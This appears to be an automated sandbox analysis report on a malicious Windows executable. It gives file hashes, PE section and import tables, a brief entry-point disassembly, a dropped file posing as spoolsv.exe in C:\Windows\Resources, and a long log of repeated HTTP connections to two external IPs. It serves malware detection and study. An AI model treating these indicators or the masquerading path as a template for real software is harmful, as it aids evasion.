                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@.......................... 7......E........................................-.D.......................................................................................................................................................@............ ..........................@............ ........................5.@....rsrc.... ....... ..................@.............+.........................@....data.........-.....................@...........................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\Resources\spoolsv.exe
                                                                                                      File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                      Category:dropped
                                                                                                      Size (bytes):759786
                                                                                                      Entropy (8bit):7.914954014139185
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1FH:lIg4kt0Kd6F6CNzYhUiEWEYcwP
                                                                                                      MD5:789AC0C78808EADDAABA13B1F71F4947
                                                                                                      SHA1:85C244C9BB75686866FF73033C3EE821758C856F
                                                                                                      SHA-256:B8EF32CC2E6C4B10B1058EA928DBDFFA3CB210393A6EFAA249338F751A252F01
                                                                                                      SHA-512:98502460A890A58B41069615A6B53BE268BA9E992A2F7BB3F6E99E2396F3C6A6C7A9E57B9D57F1EF8D16CDE2C2C10A6525F9E2E6E0C511CEB172E3C19874A877
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@.......................... 7......E........................................-.D.......................................................................................................................................................@............ ..........................@............ ........................5.@....rsrc.... ....... ..................@.............+.........................@....data.........-.....................@...........................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                      Entropy (8bit):7.919317824518108
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:file.exe
                                                                                                      File size:759'640 bytes
                                                                                                      MD5:35d43833c8e14f030d4ea74eda1b8dd5
                                                                                                      SHA1:83b0795b3ff05b3346fef4c78cee036529d228b9
                                                                                                      SHA256:dd185abc18942717c4a27c59c0eed6713347230ecee9b13085398bdfa64b8479
                                                                                                      SHA512:1d6dbeccc663dad03704a044844eb4197178198306b3033f74381d9493e147979dc1727dedb6ecc4bd20d91517188be657df4b067517378c641817327899c5ae
                                                                                                      SSDEEP:12288:ltTuh645I8jWtJ8OgL27rd69bk5NCgGhSFB79gYhLIf6EQ9EYcw1FA:lIg4kt0Kd6F6CNzYhUiEWEYcwI
                                                                                                      TLSH:61F4E15F45BEED70C313727F79A989CAFA088DA51B2C4A8A551FF371011622E3AC871D
                                                                                                      File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0....................@................
                                                                                                      Icon Hash:666b25252d0b4e31
                                                                                                      Entrypoint:0x409eac
                                                                                                      Entrypoint Section:
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                      DLL Characteristics:
                                                                                                      Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:5962c6b29ed5e50f362bf7495f752822
                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      add esp, FFFFFFF0h
                                                                                                      mov eax, 00401000h
                                                                                                      call 00007F3FD88EFB66h
                                                                                                      call far 5DE5h : 8B10C483h
                                                                                                      jmp 00007F3FD8C53351h
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2d90000x244.data
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f0000x13e8.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      0x10000x1a0000x900053d694a9daa31ab4f0d517d91f8189e2False0.9498697916666666OpenPGP Public Key7.851401794337924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      0x1b0000x20000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      0x1d0000x20000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x1f0000x20000x20004114c78b393d070eb343f5e4c4b3bdbeFalse0.2745361328125data3.1881047866122456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      0x210000x2b80000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .data0x2d90000x990000x990008737ac12682537591cf2c128fecc4b90False0.9860409007352942data7.939460972036294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0x1f1300xcd0Device independent bitmap graphic, 32 x 64 x 24, image size 30720.4292682926829268
                                                                                                      RT_GROUP_ICON0x1fe000x14data1.15
                                                                                                      RT_VERSION0x1fe140x1ecdataEnglishUnited States0.5020325203252033
                                                                                                      RT_MANIFEST0x200000x3e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42542542542542544
                                                                                                      DLLImport
                                                                                                      kernel32.dllVirtualAlloc, VirtualFree, GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                                                      user32.dllMessageBoxA
                                                                                                      advapi32.dllRegCloseKey
                                                                                                      oleaut32.dllSysFreeString
                                                                                                      gdi32.dllCreateFontA
                                                                                                      shell32.dllShellExecuteA
                                                                                                      version.dllGetFileVersionInfoA
                                                                                                      msvbvm60.dllEVENT_SINK_GetIDsOfNames
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 30, 2024 16:13:23.075747967 CEST4970580192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:23.080751896 CEST804970574.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:23.080823898 CEST4970580192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:23.081593990 CEST4970580192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:23.086533070 CEST804970574.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:23.787466049 CEST804970574.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:23.787488937 CEST804970574.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:23.788266897 CEST4970580192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:23.788268089 CEST4970580192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:23.788268089 CEST4970580192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:25.209033966 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:25.213888884 CEST8049706108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:25.213967085 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:25.214160919 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:25.218961954 CEST8049706108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:25.924947977 CEST8049706108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:25.925023079 CEST8049706108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:25.925040960 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:25.925276041 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:25.926776886 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:25.926776886 CEST4970680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:27.555946112 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:27.561439991 CEST8049708108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:27.561511993 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:27.561769962 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:27.566608906 CEST8049708108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:28.270539045 CEST8049708108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:28.270546913 CEST8049708108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:28.270606041 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:28.270642996 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:28.283191919 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:28.283224106 CEST4970880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:29.552887917 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:29.558317900 CEST804971474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:29.558486938 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:29.558796883 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:29.564466000 CEST804971474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:30.285319090 CEST804971474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:30.285345078 CEST804971474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:30.285397053 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:30.285435915 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:30.290976048 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:30.291002035 CEST4971480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:31.622922897 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:31.731753111 CEST8049716108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:31.731839895 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:31.732999086 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:31.737835884 CEST8049716108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:32.442837000 CEST8049716108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:32.442909956 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:32.443142891 CEST8049716108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:32.443192959 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:32.528273106 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:32.528311968 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:32.534413099 CEST8049716108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:32.534486055 CEST4971680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:33.985580921 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:33.990628958 CEST8049717108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:33.990715981 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:34.005450010 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:34.010412931 CEST8049717108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:34.725075006 CEST8049717108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:34.725147963 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:34.725716114 CEST8049717108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:34.725780964 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:34.725898981 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:34.725919962 CEST4971780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:36.176575899 CEST4971880192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:36.181740046 CEST804971874.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:36.181830883 CEST4971880192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:36.185051918 CEST4971880192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:36.189928055 CEST804971874.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:36.916802883 CEST804971874.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:36.916821003 CEST804971874.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:36.919523954 CEST4971880192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:36.921058893 CEST4971880192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:36.921058893 CEST4971880192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:38.563375950 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:38.568821907 CEST8049719108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:38.568898916 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:38.573492050 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:38.578938961 CEST8049719108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:39.301351070 CEST8049719108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:39.301419973 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:39.301443100 CEST8049719108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:39.301495075 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:39.314208984 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:39.314255953 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:39.321635962 CEST8049719108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:39.321697950 CEST4971980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:41.701742887 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:41.706629038 CEST8049720108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:41.706756115 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:41.707295895 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:41.712122917 CEST8049720108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:42.421715021 CEST8049720108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:42.421757936 CEST8049720108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:42.421782017 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:42.421814919 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:42.422213078 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:42.422238111 CEST4972080192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:43.692286968 CEST4972180192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:43.697474957 CEST804972174.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:43.697571993 CEST4972180192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:43.698071003 CEST4972180192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:43.703119040 CEST804972174.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:44.404170036 CEST804972174.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:44.404200077 CEST804972174.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:44.404294014 CEST4972180192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:44.410130978 CEST4972180192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:44.410151005 CEST4972180192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:45.668081999 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:46.363980055 CEST8049722108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:46.364289045 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:46.364754915 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:46.370867014 CEST8049722108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:47.074553013 CEST8049722108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:47.074651003 CEST8049722108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:47.074676037 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:47.074882984 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:47.075443029 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:47.075495958 CEST4972280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:48.317966938 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:48.323030949 CEST8049723108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:48.323154926 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:48.323319912 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:48.328479052 CEST8049723108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:49.033297062 CEST8049723108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:49.033322096 CEST8049723108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:49.033389091 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:49.033390045 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:49.037626982 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:49.037662983 CEST4972380192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:50.289290905 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:50.294506073 CEST804972474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:50.294615030 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:50.300542116 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:50.305422068 CEST804972474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:51.031826019 CEST804972474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:51.031907082 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:51.031955957 CEST804972474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:51.032011032 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:51.032495975 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:51.032531023 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:51.037556887 CEST804972474.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:51.037625074 CEST4972480192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:52.292033911 CEST4972580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:52.297086000 CEST8049725108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:52.297172070 CEST4972580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:52.306200027 CEST4972580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:52.311197996 CEST8049725108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:53.031761885 CEST8049725108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:53.031783104 CEST8049725108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:53.031847000 CEST4972580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:53.032526970 CEST4972580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:53.032569885 CEST4972580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:54.286822081 CEST4972680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:54.291735888 CEST8049726108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:54.291862011 CEST4972680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:54.292011023 CEST4972680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:54.296830893 CEST8049726108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:55.031645060 CEST8049726108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:55.031671047 CEST8049726108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:55.032140017 CEST4972680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:55.032238960 CEST4972680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:55.032238960 CEST4972680192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:56.308675051 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:56.313628912 CEST804972774.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:56.313724041 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:56.314245939 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:56.319258928 CEST804972774.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:57.132921934 CEST804972774.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:57.133095026 CEST804972774.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:57.133127928 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:57.134792089 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:57.146305084 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:57.146392107 CEST4972780192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:13:58.412008047 CEST4972880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:58.416889906 CEST8049728108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:58.416970015 CEST4972880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:58.417239904 CEST4972880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:58.422040939 CEST8049728108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:59.143460989 CEST8049728108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:59.143481016 CEST8049728108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:13:59.143726110 CEST4972880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:59.144114017 CEST4972880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:13:59.144203901 CEST4972880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:14:00.429084063 CEST4972980192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:14:00.435992956 CEST8049729108.177.15.82192.168.2.5
